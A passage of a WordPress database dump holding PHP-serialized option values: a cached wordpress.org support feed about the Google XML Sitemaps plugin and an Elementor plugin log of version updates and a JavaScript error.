\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"https://wordpress.org/support/topic/woocommerce-coverage-products-not-listed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"WooCommerce coverage &amp;#8211; Products not listed\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"https://wordpress.org/support/topic/woocommerce-coverage-products-not-listed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 28 Aug 2019 16:11:36 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:762:\"\n						\n						<p>Replies: 1</p>\n						<p>Hi,</p>\n<p>I just installed the plugin and added the URL to Google Search Console. The number of pages indexed is very limited. I am running WooCommerce and it seems the product pages and other related pages are not indexed. Please instruct how to ensure the plugin would work properly with Woo and all pages are indexed?</p>\n<p>Thank you,<br />\nAmir</p>\n\n\n<ul id=\"bbp-topic-revision-log-11876190\" class=\"bbp-topic-revision-log\">\n\n	<li id=\"bbp-topic-revision-log-11876190-item-11876273\" class=\"bbp-topic-revision-log-item\">\n		This topic was modified 2 months, 2 weeks ago by <a href=\"https://wordpress.org/support/users/ahsadaghiani/\" title=\"View ahsadaghiani&#039;s profile\">ahsadaghiani</a>.\n	</li>\n\n</ul>\n\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"ahsadaghiani\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:25;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"https://wordpress.org/support/topic/links-to-webmaster-tools-not-working/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"Links to Webmaster tools not working\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"https://wordpress.org/support/topic/links-to-webmaster-tools-not-working/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 27 Aug 2019 20:02:32 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:444:\"\n						\n						<p>Replies: 2</p>\n						<p>The links to the Bing and Google webmaster tools now don&#8217;t go to any Bing or Google site.  The Google one, for example, goes to:</p>\n<p><a href=\"https://8rkh4sskhh.execute-api.us-east-1.amazonaws.com/gsg/v1/sitemap-gwt\" rel=\"nofollow\">https://8rkh4sskhh.execute-api.us-east-1.amazonaws.com/gsg/v1/sitemap-gwt</a></p>\n<p>This link produces a 404 error.  Any idea what is happening?</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"CarolWP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:26;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:80:\"https://wordpress.org/support/topic/my-description-is-not-seen-in-google-search/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:43:\"My Description is not seen in google search\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:80:\"https://wordpress.org/support/topic/my-description-is-not-seen-in-google-search/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 26 Aug 2019 08:36:20 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:176:\"\n						\n						<p>Replies: 0</p>\n						<p>My Description is not showing in google search results. Please let me if have to activate or deactivate any settings. </p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"tinasilvee\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:27;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:91:\"https://wordpress.org/support/topic/how-to-include-pages-with-custom-query-vars-in-sitemap/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"How to include pages with custom query vars in sitemap\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:91:\"https://wordpress.org/support/topic/how-to-include-pages-with-custom-query-vars-in-sitemap/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 22 Aug 2019 14:41:23 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1277:\"\n						\n						<p>Replies: 0</p>\n						<p>Hi,</p>\n<p>First, thank you for your magnificent plugin. </p>\n<p>I created a custom query vars to filter posts by date, like this:</p>\n<pre><code>function sm_register_query_vars( $vars ) {\n    $vars[] = &#039;date&#039;;\n    return $vars;\n}\nadd_filter( &#039;query_vars&#039;, &#039;sm_register_query_vars&#039; );</code></pre>\n<p>then I created a rewrite rule to make this kind of slug seo friendly, like this:</p>\n<pre><code>function add_rewrite_rules($aRules) {\n$aNewRules = array(\n	&#039;^calendar/(.+?)/?&#039; =&gt; &#039;index.php?date=$matches[1]&#039;,\n);\n$aRules = $aNewRules + $aRules;\nreturn $aRules;\n}\nadd_filter(&#039;rewrite_rules_array&#039;, &#039;add_rewrite_rules&#039;);</code></pre>\n<p>And now I have many pages like this that are generated dynamically:</p>\n<p>mydomain.tld/calendar/YYYY-MM-DD/</p>\n<p>But as those pages are not a standard content&#8230; the plugin &#8220;Google XML Sitemaps&#8221; can not take them into consideration and cannot include them into sitemap.</p>\n<p>I did include some of them manually as &#8220;Additional Pages&#8221;, but as there are many of them, I am asking is there a programmatically way to add those kind of pages to sitemap.</p>\n<p>Thank you for your help.</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"charafweb\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:28;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:62:\"https://wordpress.org/support/topic/tons-of-sitemap-pt-post-2/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"Tons of &amp;#8220;/sitemap-pt-post-XXX&amp;#8221; errors on GSConsole, how to fix?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:62:\"https://wordpress.org/support/topic/tons-of-sitemap-pt-post-2/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 21 Aug 2019 16:27:53 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:402:\"\n						\n						<p>Replies: 0</p>\n						<p>Guys, since I delete this plugin I receive (it&#8217;s like a year now) lots of error on Google Search Console about these pages that doesn&#8217;t exist anymore. &#8211;&gt; </p>\n<p><a href=\"https://prnt.sc/ovp6l0\" rel=\"nofollow\">https://prnt.sc/ovp6l0</a></p>\n<p>Is there a way to fix this and maybe create a single redirect for all of them? </p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"Jedi82\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:29;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"https://wordpress.org/support/topic/google-not-indexing-my-sitemap/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"Google Not Indexing My Sitemap\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"https://wordpress.org/support/topic/google-not-indexing-my-sitemap/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 19 Aug 2019 12:06:22 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:396:\"\n						\n						<p>Replies: 4</p>\n						<p>Hello, For the past 10 days since I switch my sitemap to Google Sitemap Generator, I have been having series of sleeplessness because all my contents have refused to be indexed and my blog is not making any sense. Google sitemap shows they are been crawled but not indexed. Could this be an issue caused by the generator or Google itself?</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"jamm\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}s:27:\"http://www.w3.org/2005/Atom\";a:1:{s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:4:\"href\";s:67:\"https://wordpress.org/support/plugin/google-sitemap-generator/feed/\";s:3:\"rel\";s:4:\"self\";s:4:\"type\";s:19:\"application/rss+xml\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";O:42:\"Requests_Utility_CaseInsensitiveDictionary\":1:{s:7:\"\0*\0data\";a:8:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Tue, 12 Nov 2019 15:12:47 GMT\";s:12:\"content-type\";s:34:\"application/rss+xml; charset=UTF-8\";s:25:\"strict-transport-security\";s:11:\"max-age=360\";s:6:\"x-olaf\";s:3:\"â›„\";s:12:\"x-robots-tag\";s:15:\"noindex, follow\";s:15:\"x-frame-options\";s:10:\"SAMEORIGIN\";s:4:\"x-nc\";s:9:\"HIT ord 2\";}}s:5:\"build\";s:14:\"20130911013210\";}','no'),(11767,'elementor_log','a:20:{s:32:\"be194e140ba6f26c8659b0f1b42b0922\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2019-02-07 10:02:02\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"2.3.8\";s:2:\"to\";s:5:\"2.4.5\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2019-02-07 10:02:02\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"2.3.8\";s:2:\"to\";s:5:\"2.4.5\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}s:32:\"e0720bc18075c569e4a5e90edd839a19\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2019-02-12 16:27:56\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"2.4.5\";s:2:\"to\";s:5:\"2.4.6\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2019-02-12 16:27:56\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"2.4.5\";s:2:\"to\";s:5:\"2.4.6\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}s:32:\"bc9377d3760bf92a9402e6d26555964a\";O:30:\"Elementor\\Core\\Logger\\Items\\JS\":10:{s:9:\"\0*\0column\";s:5:\"18481\";s:7:\"\0*\0file\";s:87:\"https://bintara.com.my/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=2.4.6\";s:7:\"\0*\0line\";s:1:\"2\";s:7:\"\0*\0date\";s:19:\"2019-03-04 08:31:41\";s:7:\"\0*\0type\";s:5:\"error\";s:10:\"\0*\0message\";s:52:\"Cannot read property \\&#039;getIframe\\&#039; of null\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2019-03-04 08:31:41\";}s:7:\"\0*\0args\";a:6:{s:4:\"type\";s:5:\"error\";s:9:\"timestamp\";s:10:\"1551688301\";s:7:\"message\";s:42:\"Cannot read property \\\'getIframe\\\' of null\";s:3:\"url\";s:87:\"https://bintara.com.my/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=2.4.6\";s:4:\"line\";s:1:\"2\";s:6:\"column\";s:5:\"18481\";}}s:32:\"cf09510b6097f9b42aec9922ae421a9a\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2019-03-08 16:34:13\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"2.4.6\";s:2:\"to\";s:5:\"2.5.3\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2019-03-08 16:34:13\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"2.4.6\";s:2:\"to\";s:5:\"2.5.3\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}s:32:\"df35be02b3664ab84f4cf9d8f37f7691\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2019-03-11 17:19:45\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"2.5.3\";s:2:\"to\";s:5:\"2.5.4\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2019-03-11 17:19:45\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"2.5.3\";s:2:\"to\";s:5:\"2.5.4\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}s:32:\"c50677b18507ddc8ee5e7b0a2a9c19e5\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2019-04-15 15:32:42\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"2.5.4\";s:2:\"to\";s:6:\"2.5.13\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2019-04-15 15:32:42\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"2.5.4\";s:2:\"to\";s:6:\"2.5.13\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}s:32:\"03f8314d7f16b1a0b2e9f61e6abde1d7\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2019-04-24 11:42:22\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"2.5.13\";s:2:\"to\";s:6:\"2.5.14\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2019-04-24 11:42:22\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"2.5.13\";s:2:\"to\";s:6:\"2.5.14\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}s:32:\"ff0364bfe03f9af6f02794f1690021af\";O:31:\"Elementor\\Core\\Logger\\Items\\PHP\":9:{s:7:\"\0*\0file\";s:96:\"/home/norfaiz/public_html/bintara.com.my/wp-content/plugins/elementor/core/logger/items/base.php\";s:7:\"\0*\0line\";i:101;s:7:\"\0*\0date\";s:19:\"2019-09-13 14:38:28\";s:7:\"\0*\0type\";s:6:\"notice\";s:10:\"\0*\0message\";s:26:\"Array to string conversion\";s:7:\"\0*\0meta\";a:1:{s:5:\"trace\";a:1:{i:0;a:3:{s:8:\"function\";s:8:\"shutdown\";s:5:\"class\";s:29:\"Elementor\\Core\\Logger\\Manager\";s:4:\"type\";s:2:\"->\";}}}s:8:\"\0*\0times\";i:2;s:14:\"\0*\0times_dates\";a:2:{i:0;s:19:\"2019-09-13 14:38:28\";i:1;s:19:\"2019-09-13 14:40:39\";}s:7:\"\0*\0args\";a:5:{s:4:\"type\";s:6:\"notice\";s:7:\"message\";s:26:\"Array to string conversion\";s:4:\"file\";s:96:\"/home/norfaiz/public_html/bintara.com.my/wp-content/plugins/elementor/core/logger/items/base.php\";s:4:\"line\";i:101;s:5:\"trace\";b:1;}}s:32:\"be56e54509cd77de966372f9ee654835\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2019-10-25 15:00:54\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:47:\"Elementor data updater process has been queued.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"2.5.14\";s:2:\"to\";s:5:\"2.7.4\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2019-10-25 15:00:54\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"2.5.14\";s:2:\"to\";s:5:\"2.7.4\";}s:7:\"message\";s:47:\"Elementor data updater process has been queued.\";s:4:\"type\";s:4:\"info\";}}s:32:\"19202d4aff68d02e64a034d8471b46f4\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2019-10-25 15:00:55\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:36:\"elementor::elementor_updater Started\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2019-10-25 15:00:55\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:36:\"elementor::elementor_updater Started\";s:4:\"type\";s:4:\"info\";}}s:32:\"afe4518ee9d483223e29995b7c9dfe7c\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2019-10-25 15:00:55\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:55:\"Elementor/Upgrades - _v_2_6_0_fa4_migration_flag Start \";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2019-10-25 15:00:55\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:55:\"Elementor/Upgrades - _v_2_6_0_fa4_migration_flag Start \";s:4:\"type\";s:4:\"info\";}}s:32:\"158ba3eb0b07088b25d460d683b0afef\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2019-10-25 15:00:55\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:57:\"Elementor/Upgrades - _v_2_6_0_fa4_migration_flag Finished\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2019-10-25 15:00:55\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:57:\"Elementor/Upgrades - _v_2_6_0_fa4_migration_flag Finished\";s:4:\"type\";s:4:\"info\";}}s:32:\"6110c69a3920cffb061beedfc0098516\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2019-10-25 15:00:55\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:57:\"Elementor/Upgrades - _v_2_6_6_fa4_migration_button Start \";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2019-10-25 15:00:55\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:57:\"Elementor/Upgrades - _v_2_6_6_fa4_migration_button Start \";s:4:\"type\";s:4:\"info\";}}s:32:\"72c582b6cc40ed9828ec37217ecb81ba\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2019-10-25 15:00:55\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:59:\"Elementor/Upgrades - _v_2_6_6_fa4_migration_button Finished\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2019-10-25 15:00:55\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:59:\"Elementor/Upgrades - _v_2_6_6_fa4_migration_button Finished\";s:4:\"type\";s:4:\"info\";}}s:32:\"d2efa2e6c7d5ff2a2d90ea9b65ff1d0c\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2019-10-25 15:00:55\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:58:\"Elementor/Upgrades - _v_2_7_1_remove_old_usage_data Start \";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2019-10-25 15:00:55\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:58:\"Elementor/Upgrades - _v_2_7_1_remove_old_usage_data Start \";s:4:\"type\";s:4:\"info\";}}s:32:\"6e707197e42054eb35557b8640a38e75\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2019-10-25 15:00:55\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:60:\"Elementor/Upgrades - _v_2_7_1_remove_old_usage_data 